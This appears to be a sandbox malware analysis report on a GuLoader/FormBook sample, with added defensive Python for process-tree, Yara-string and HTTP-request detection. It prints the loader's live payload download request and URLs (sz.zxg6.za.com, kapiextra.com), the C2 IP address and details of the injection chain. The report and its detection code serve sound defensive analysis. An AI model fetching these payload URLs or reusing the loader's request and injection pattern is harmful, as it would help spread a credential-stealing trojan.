
Windows Analysis Report
TRIAL_ORDER_CP.exe

Overview

General Information

Sample name:TRIAL_ORDER_CP.exe
Analysis ID:1500398
MD5:5a14d64b70fc7106cb6c14be1aaa7482
SHA1:0612c6f0f1aa18f6e96de3d7ae39193981d9bb95
SHA256:bdd5b953bef085550bb5891e8d3c7248b5b16fcbba1bb26e2be18c4801d1a98e

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • TRIAL_ORDER_CP.exe (PID: 3000 cmdline: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe" MD5: 5A14D64B70FC7106CB6C14BE1AAA7482)
    • TRIAL_ORDER_CP.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe" MD5: 5A14D64B70FC7106CB6C14BE1AAA7482)
      • RAVCpl64.exe (PID: 5968 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • Robocopy.exe (PID: 4364 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 6B2AE9D48535CE68D53D56E65248BB4C)
          • explorer.exe (PID: 5060 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
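The process tree above is the whole infection chain in one picture: the NSIS-packed sample re-launches its own image, that copy starts a legitimately signed third-party binary (RAVCpl64.exe), which starts a SysWOW64 copy tool with an empty command line, and explorer.exe then appears as Robocopy.exe's child. The Yara hits below land in process 6, which the PDB lines identify as Robocopy.exe, so the copy tool is only a host for the FormBook stage. The following Python is an added example (not part of the Joe Sandbox report and not a vendor rule) that rebuilds the chain from process-creation records and flags the three links that do not occur in normal operation. The event records are constructed from the report's tree (PIDs, images and command lines are the report's; the field names, the "normal shell launchers" list and the two benign logon events are assumptions).

```python
"""Reconstruct and flag the injection chain in the report's process tree.

Added example; not part of the Joe Sandbox report and not a vendor rule.
EVENTS is constructed from the report's tree (PIDs, images and command
lines are the report's; the field names mimic a process-creation log and
the benign logon events at the end are made up for contrast).
"""
import ntpath

EVENTS = [
    {"pid": 3000, "ppid": 1, "image": r"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",
     "cmd": r'"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"'},
    {"pid": 7964, "ppid": 3000, "image": r"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",
     "cmd": r'"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"'},
    {"pid": 5968, "ppid": 7964, "image": r"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe",
     "cmd": r'"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s'},
    {"pid": 4364, "ppid": 5968, "image": r"C:\Windows\SysWOW64\Robocopy.exe",
     "cmd": r'"C:\Windows\SysWOW64\Robocopy.exe"'},
    {"pid": 5060, "ppid": 4364, "image": r"C:\Windows\Explorer.EXE",
     "cmd": r"C:\Windows\Explorer.EXE"},
    # Constructed benign logon chain (not from the report): userinit.exe starting the shell.
    {"pid": 5999, "ppid": 1, "image": r"C:\Windows\System32\userinit.exe",
     "cmd": r"C:\Windows\System32\userinit.exe"},
    {"pid": 6000, "ppid": 5999, "image": r"C:\Windows\explorer.exe",
     "cmd": r"C:\Windows\explorer.exe"},
]

# Assumptions, not report data: who normally starts the shell, and which
# copy utilities do nothing useful when started without arguments.
SHELL_LAUNCHERS = {"userinit.exe", "winlogon.exe", "explorer.exe"}
COPY_TOOLS = {"robocopy.exe", "xcopy.exe"}


def image_name(path):
    return ntpath.basename(path).lower()


def arguments(cmdline):
    """Everything after the (possibly quoted) executable token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def find_suspicious(events):
    """Return (pid, reason) for each link of the chain that should not occur normally."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # no parent record: nothing to compare against
        pname = image_name(parent["image"])
        # explorer.exe under anything but the logon chain: the report shows it
        # as a child of the hollowed copy tool, not of userinit/winlogon.
        if name == "explorer.exe" and pname not in SHELL_LAUNCHERS:
            findings.append((e["pid"], "explorer.exe started by %s" % pname))
        # A copy tool with an empty command line copies nothing; in the report it
        # only hosts the injected FormBook stage (Yara hits in process 6).
        if name in COPY_TOOLS and arguments(e["cmd"]) == "":
            findings.append((e["pid"], "%s launched with no arguments by %s" % (name, pname)))
        # The sample re-launching its own image from a user-profile path; the
        # report flags suspended-mode process creation and thread injection.
        if pname == name and e["image"].lower().startswith("c:\\users\\"):
            findings.append((e["pid"], "%s re-launched itself from a user profile path" % name))
    return findings


if __name__ == "__main__":
    print(" -> ".join(ancestry(EVENTS, 5060)))
    for pid, why in find_suspicious(EVENTS):
        print(pid, why)
```

Run against the constructed events the script flags PIDs 7964, 4364 and 5060 and leaves the logon-time explorer.exe alone; on real telemetry feed it Sysmon event 1 or Security 4688 records mapped to the same four fields.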
Yara matches (Source, Rule, Description, Author, Strings):

Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

(2 further Yara entries are collapsed in the original report)
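The two hex strings above are the only rule content the report exposes, and they are enough to re-check a dump taken from your own host against the same indicators. The Python below is an added example (not part of the Joe Sandbox report and not the Yara rule's own code): it parses the report's match lines exactly as printed into byte patterns, reports every offset at which each pattern occurs in a buffer, and compares a file's digests with the report's MD5/SHA1/SHA256. The buffer it scans is constructed with the patterns placed at the report's offsets; it is not real process memory, so the hash comparison against it is expected to fail.

```python
"""Check a dump for the report's Formbook string matches and a file against its hashes.

Added example; not part of the Joe Sandbox report and not the Yara rule's
own code. REPORT_MATCHES and REPORT_HASHES are copied from the report; the
buffer scanned below is constructed, not real process memory.
"""
import hashlib
import re

REPORT_MATCHES = [
    "0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
]
REPORT_HASHES = {
    "md5": "5a14d64b70fc7106cb6c14be1aaa7482",
    "sha1": "0612c6f0f1aa18f6e96de3d7ae39193981d9bb95",
    "sha256": "bdd5b953bef085550bb5891e8d3c7248b5b16fcbba1bb26e2be18c4801d1a98e",
}
# offset:$id: hex bytes, as the report prints them
_MATCH_LINE = re.compile(r"^(0x[0-9a-fA-F]+):(\$\w+):\s*((?:[0-9a-fA-F]{2}\s*)+)$")


def parse_match(line):
    """'0x2c040:$a2: 74 0A ...' -> (offset, string id, pattern bytes)."""
    m = _MATCH_LINE.match(line.strip())
    if m is None:
        raise ValueError("not a Yara match line: %r" % line)
    return int(m.group(1), 16), m.group(2), bytes.fromhex(m.group(3))


def scan(buf, matches=REPORT_MATCHES):
    """Every offset of every pattern in buf, keyed by string id (all hits, not only the first)."""
    hits = {}
    for line in matches:
        _, sid, pattern = parse_match(line)
        offsets, pos = [], buf.find(pattern)
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(pattern, pos + 1)
        hits[sid] = offsets
    return hits


def digests(data):
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def compare_hashes(data, expected=REPORT_HASHES):
    """Per-algorithm True/False against the report's values."""
    got = digests(data)
    return {name: got[name] == value for name, value in expected.items()}


def constructed_dump():
    """Synthetic buffer (not real memory) with both patterns at the offsets the report lists."""
    buf = bytearray(0x30000)
    for line in REPORT_MATCHES:
        offset, _, pattern = parse_match(line)
        buf[offset:offset + len(pattern)] = pattern
    return bytes(buf)


if __name__ == "__main__":
    dump = constructed_dump()
    for sid, offsets in scan(dump).items():
        print(sid, [hex(o) for o in offsets])
    print(compare_hashes(dump))
```

On a real capture, read the dump or the dropped file into `scan()` and `compare_hashes()` in place of the constructed buffer; the offsets the report lists are relative to the start of the dumped region, so a hit elsewhere in your own dump is still a hit.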

        System Summary

Sigma match (Suspicious Copy From or To System Directory, listed under Signatures above)
Source: Process started
Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
Data:
  Command: "C:\Windows\SysWOW64\Robocopy.exe"
  CommandLine: "C:\Windows\SysWOW64\Robocopy.exe"
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\Robocopy.exe
  NewProcessName: C:\Windows\SysWOW64\Robocopy.exe
  OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe
  ParentCommandLine: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
  ParentImage: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
  ParentProcessId: 5968
  ParentProcessName: RAVCpl64.exe
  ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe"
  ProcessId: 4364
  ProcessName: Robocopy.exe

Suricata alert
        Timestamp:2024-08-28T12:25:21.088617+0200
        SID:2803270
        Severity:2
        Source Port:49865
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic


        AV Detection

Source: TRIAL_ORDER_CP.exe ReversingLabs: Detection: 26%
Source: TRIAL_ORDER_CP.exe Virustotal: Detection: 42%
Source: Yara match File source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: TRIAL_ORDER_CP.exe Joe Sandbox ML: detected
Source: TRIAL_ORDER_CP.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: TRIAL_ORDER_CP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: robocopy.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: TRIAL_ORDER_CP.exe, TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: robocopy.pdbGCTL source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 0_2_004068B1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 4x nop then mov ebx, 00000004h (3_2_338004DE)
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 4x nop then mov ebx, 00000004h (5_2_0473ED1C)
Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 4x nop then mov ebx, 00000004h (6_2_048804DE)
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49865 -> 38.242.218.41:80
Source: global traffic HTTP traffic detected:
  GET /.ex/ELFyaa85.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: sz.zxg6.za.com
  Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
  GET /.ex/ELFyaa85.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: sz.zxg6.za.com
  Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: sz.zxg6.za.com
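The request the loader sends carries a Firefox User-Agent but only three headers in total, which is why the report notes "Uses a known web browser user agent" and Suricata tags the flow as a downloader header pattern: a navigating browser sends Accept, Accept-Language, Accept-Encoding and Connection as a matter of course. The Python below is an added example (not report content, and not the Suricata rule, whose body is not on the page): it rebuilds the request from the report with CRLF endings, extracts the URL as an IOC, lists which browser headers are absent, and contrasts it with a constructed request from a real browser for the same URL. The browser-header baseline, the User-Agent tokens and the contrast request are assumptions.

```python
"""Profile the downloader's GET request from the report against a browser's header set.

Added example; not from the Joe Sandbox report and not the Suricata rule.
REQUEST is the report's request rebuilt with CRLF line endings. BROWSER_REQUEST,
BROWSER_HEADERS and BROWSER_UA_TOKENS are assumptions for contrast, not report data.
"""
REQUEST = (
    b"GET /.ex/ELFyaa85.bin HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\r\n"
    b"Host: sz.zxg6.za.com\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
# Constructed for contrast (not observed traffic): the same URL fetched by a browser.
BROWSER_REQUEST = (
    b"GET /.ex/ELFyaa85.bin HTTP/1.1\r\n"
    b"Host: sz.zxg6.za.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\r\n"
    b"Accept: */*\r\n"
    b"Accept-Language: en-US,en;q=0.5\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding", "connection"}  # assumption
BROWSER_UA_TOKENS = ("firefox/", "chrome/", "safari/", "edg/")                      # assumption
PAYLOAD_SUFFIXES = (".bin", ".exe", ".dll")                                         # assumption


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, version and lower-cased headers."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def assess(raw):
    """IOC URL plus the reasons this request does not look like a browser navigation."""
    req = parse_request(raw)
    h = req["headers"]
    ua = h.get("user-agent", "").lower()
    reasons = []
    missing = sorted(BROWSER_HEADERS - set(h))
    # A browser User-Agent without the headers every browser sends is a
    # fingerprint of a hand-rolled downloader, not of Firefox.
    if any(tok in ua for tok in BROWSER_UA_TOKENS) and missing:
        reasons.append("browser User-Agent but no %s header" % ", ".join(missing))
    if req["path"].lower().endswith(PAYLOAD_SUFFIXES):
        reasons.append("fetches a %s payload" % req["path"].rsplit(".", 1)[-1])
    return {
        "url": "http://%s%s" % (h.get("host", ""), req["path"]),
        "missing_browser_headers": missing,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for raw in (REQUEST, BROWSER_REQUEST):
        print(assess(raw))
```

Feed it the request bytes from a PCAP (everything up to the blank line) and the `url` field is the IOC to block, while `missing_browser_headers` tells you whether the "Firefox" claim is worth anything.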
Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoot
Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: TRIAL_ORDER_CP.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: explorer.exe, 00000007.00000002.275186219956.0000000002960000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275193654796.0000000009C20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.272433570950.000000000AB90000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.bin
Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270971425091.0000000032F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.bin
Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.binJ
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000626000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQ
Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSB
Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSXboxGamew
Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOStore_8wec
Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSyb3d8bbw
Source: explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.wy
Source: explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.275196926066.000000000D2EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2EF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?=
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&oc
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.272432151244.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272794146189.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.0000000009886000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?$
Source: explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/
